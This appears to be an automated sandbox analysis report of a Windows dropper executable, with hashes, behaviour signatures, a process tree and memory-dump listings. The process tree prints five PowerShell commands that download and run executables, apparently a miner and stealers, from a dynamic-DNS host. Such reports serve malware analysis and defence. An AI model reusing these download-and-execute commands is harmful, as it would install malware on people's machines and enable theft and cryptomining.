2935daeddeb1f505cea4ad368f598ab029942d91d831b71bbe4de5284c7a3132

Analysis

max time kernel
121s
max time network
121s
platform
windows7_x64
resource
win7-20240220-en
resource tags

arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system
submitted
28-03-2024 09:24

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

[email protected]
Size

451KB
MD5

6614077c77a8182f0307a720071f2197
SHA1

06a06a6d02ad281942ed8b6890f099be54275bb2
SHA256

2935daeddeb1f505cea4ad368f598ab029942d91d831b71bbe4de5284c7a3132
SHA512

26b1249631b8762d332b04ccac12faf4e52a4641efa90ff0c13596715c5ef8f4eb08c4e6e32efe551ebf3a3a432a897c33eafa9980dd12eeb65213081f3d77cb
SSDEEP

12288:QLMEalqxXblqoRX5qbfphLxaO3qX+t4SJ:cqaXNabfphLxa4w4

Score

3^/10

Malware Config

Signatures

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
2304	powershell.exe
2456	powershell.exe
2440	powershell.exe
2948	powershell.exe
2760	powershell.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	2304	powershell.exe
Token: SeDebugPrivilege	2456	powershell.exe
Token: SeDebugPrivilege	2440	powershell.exe
Token: SeDebugPrivilege	2948	powershell.exe
Token: SeDebugPrivilege	2760	powershell.exe

Suspicious use of WriteProcessMemory 21 IoCs

description	pid	Process	procid_target
PID 2368 wrote to memory of 2396	2368	[email protected]	28
PID 2368 wrote to memory of 2396	2368	[email protected]	28
PID 2368 wrote to memory of 2396	2368	[email protected]	28
PID 2396 wrote to memory of 3064	2396	WScript.exe	29
PID 2396 wrote to memory of 3064	2396	WScript.exe	29
PID 2396 wrote to memory of 3064	2396	WScript.exe	29
PID 3064 wrote to memory of 2304	3064	cmd.exe	31
PID 3064 wrote to memory of 2304	3064	cmd.exe	31
PID 3064 wrote to memory of 2304	3064	cmd.exe	31
PID 3064 wrote to memory of 2456	3064	cmd.exe	32
PID 3064 wrote to memory of 2456	3064	cmd.exe	32
PID 3064 wrote to memory of 2456	3064	cmd.exe	32
PID 3064 wrote to memory of 2440	3064	cmd.exe	33
PID 3064 wrote to memory of 2440	3064	cmd.exe	33
PID 3064 wrote to memory of 2440	3064	cmd.exe	33
PID 3064 wrote to memory of 2948	3064	cmd.exe	34
PID 3064 wrote to memory of 2948	3064	cmd.exe	34
PID 3064 wrote to memory of 2948	3064	cmd.exe	34
PID 3064 wrote to memory of 2760	3064	cmd.exe	35
PID 3064 wrote to memory of 2760	3064	cmd.exe	35
PID 3064 wrote to memory of 2760	3064	cmd.exe	35

C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
1⤵
- Suspicious use of WriteProcessMemory
PID:2368
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\down.vbs"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2396
- - C:\Windows\System32\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\down.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3064
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -c "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://puredgb.duckdns.org:30000/ejr9e45s/xmr.exe' -OutFile 'C:\Users\Admin\AppData\Roaming\6.exe'; C:\Users\Admin\AppData\Roaming\6.exe"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2304
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -c "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://puredgb.duckdns.org:30000/hyar8z46/discord.exe' -OutFile 'C:\Users\Admin\AppData\Roaming\1.exe'; C:\Users\Admin\AppData\Roaming\1.exe"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2456
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -c "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://puredgb.duckdns.org:30000/gn1jv6sz/xeno.exe' -OutFile 'C:\Users\Admin\AppData\Roaming\2.exe'; C:\Users\Admin\AppData\Roaming\2.exe"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2440
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -c "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://puredgb.duckdns.org:30000/6nif5f8r/address.exe' -OutFile 'C:\Users\Admin\AppData\Roaming\5.exe'; C:\Users\Admin\AppData\Roaming\5.exe"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2948
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -c "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://puredgb.duckdns.org:30000/g0nv8z1z/creal.exe' -OutFile 'C:\Users\Admin\AppData\Roaming\4.exe'; C:\Users\Admin\AppData\Roaming\4.exe"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2760

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\down.bat

Filesize
1KB

MD5
48d0fbe997f37f768ab67afa935f4db8

SHA1
21bd27b35e0edd6e4a02c5d3e19ba3e1388e36c5

SHA256
bff2534d8b88513358894215ac244520d70b226e463d3035c4ca39892dacfff7

SHA512
286e7190ee8840f54977f78e101087a8d73682b665fee75bdb68d8e3f51ee0b6ace28a69f52953c36951e979bb9b9299d7341d415165141202738bc7b8eb341d

Download Submit
C:\Users\Admin\AppData\Local\Temp\down.vbs

Filesize
121B

MD5
f320a0b986e09c248827af4ee48e23b9

SHA1
083fd1f18057e1077d5a88f54e190e95c910918f

SHA256
ab93c1042a9eca743335a1dc9192e3df891960b00d243278f18c3b8beff0555f

SHA512
33150cbb8734eb6f37dec03ca573766d5f0324774bce9f28d259c180f1a26ede32dc11a1d8378473ac32a297e8770456a27b942d860003c0f316fc7ecc58eae3

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
36f3bead983fb775dcfb20f57e3b78f7

SHA1
bb7d6c5a8499dd1b4b3179d9cd72462902f9b559

SHA256
5c8ef6232ceb600182cb45e2afcc26b588ecf9921204853433d496e5f615e3d4

SHA512
b9a1470f6c9cf0047e60823b9ea683722473a087f8c2ce53d4b15deadd561c13506cf7247df3b1dfb9715787372cbb43734abed9f61c5290d1475bd18915082f

Download Submit
memory/2304-18-0x0000000002690000-0x0000000002710000-memory.dmp

Filesize
512KB

Download
memory/2304-19-0x000007FEF5C20000-0x000007FEF65BD000-memory.dmp

Filesize
9.6MB

Download
memory/2304-15-0x0000000002690000-0x0000000002710000-memory.dmp

Filesize
512KB

Download
memory/2304-16-0x0000000002690000-0x0000000002710000-memory.dmp

Filesize
512KB

Download
memory/2304-17-0x0000000002690000-0x0000000002710000-memory.dmp

Filesize
512KB

Download
memory/2304-13-0x0000000002680000-0x0000000002688000-memory.dmp

Filesize
32KB

Download
memory/2304-20-0x000007FEF5C20000-0x000007FEF65BD000-memory.dmp

Filesize
9.6MB

Download
memory/2304-14-0x000007FEF5C20000-0x000007FEF65BD000-memory.dmp

Filesize
9.6MB

Download
memory/2304-12-0x000000001B610000-0x000000001B8F2000-memory.dmp

Filesize
2.9MB

Download
memory/2304-69-0x000007FEF5C20000-0x000007FEF65BD000-memory.dmp

Filesize
9.6MB

Download
memory/2440-45-0x000007FEF5C20000-0x000007FEF65BD000-memory.dmp

Filesize
9.6MB

Download
memory/2440-44-0x0000000002D60000-0x0000000002DE0000-memory.dmp

Filesize
512KB

Download
memory/2440-43-0x0000000002D60000-0x0000000002DE0000-memory.dmp

Filesize
512KB

Download
memory/2440-42-0x000007FEF5C20000-0x000007FEF65BD000-memory.dmp

Filesize
9.6MB

Download
memory/2440-40-0x000007FEF5C20000-0x000007FEF65BD000-memory.dmp

Filesize
9.6MB

Download
memory/2440-41-0x0000000002D60000-0x0000000002DE0000-memory.dmp

Filesize
512KB

Download
memory/2456-34-0x000007FEF5280000-0x000007FEF5C1D000-memory.dmp

Filesize
9.6MB

Download
memory/2456-33-0x0000000002C90000-0x0000000002D10000-memory.dmp

Filesize
512KB

Download
memory/2456-32-0x0000000002C90000-0x0000000002D10000-memory.dmp

Filesize
512KB

Download
memory/2456-30-0x000007FEF5280000-0x000007FEF5C1D000-memory.dmp

Filesize
9.6MB

Download
memory/2456-31-0x0000000002C90000-0x0000000002D10000-memory.dmp

Filesize
512KB

Download
memory/2456-28-0x0000000002C90000-0x0000000002D10000-memory.dmp

Filesize
512KB

Download
memory/2456-29-0x0000000002810000-0x0000000002818000-memory.dmp

Filesize
32KB

Download
memory/2456-26-0x000000001B480000-0x000000001B762000-memory.dmp

Filesize
2.9MB

Download
memory/2456-27-0x000007FEF5280000-0x000007FEF5C1D000-memory.dmp

Filesize
9.6MB

Download
memory/2760-64-0x000007FEF5C20000-0x000007FEF65BD000-memory.dmp

Filesize
9.6MB

Download
memory/2760-62-0x000007FEF5C20000-0x000007FEF65BD000-memory.dmp

Filesize
9.6MB

Download
memory/2760-63-0x0000000002390000-0x0000000002410000-memory.dmp

Filesize
512KB

Download
memory/2760-65-0x0000000002390000-0x0000000002410000-memory.dmp

Filesize
512KB

Download
memory/2760-66-0x0000000002390000-0x0000000002410000-memory.dmp

Filesize
512KB

Download
memory/2760-67-0x0000000002390000-0x0000000002410000-memory.dmp

Filesize
512KB

Download
memory/2760-68-0x000007FEF5C20000-0x000007FEF65BD000-memory.dmp

Filesize
9.6MB

Download
memory/2948-53-0x000007FEF5280000-0x000007FEF5C1D000-memory.dmp

Filesize
9.6MB

Download
memory/2948-54-0x0000000002D10000-0x0000000002D90000-memory.dmp

Filesize
512KB

Download
memory/2948-55-0x0000000002D10000-0x0000000002D90000-memory.dmp

Filesize
512KB

Download
memory/2948-56-0x000007FEF5280000-0x000007FEF5C1D000-memory.dmp

Filesize
9.6MB

Download
memory/2948-52-0x0000000002D10000-0x0000000002D90000-memory.dmp

Filesize
512KB

Download
memory/2948-51-0x000007FEF5280000-0x000007FEF5C1D000-memory.dmp

Filesize
9.6MB

Download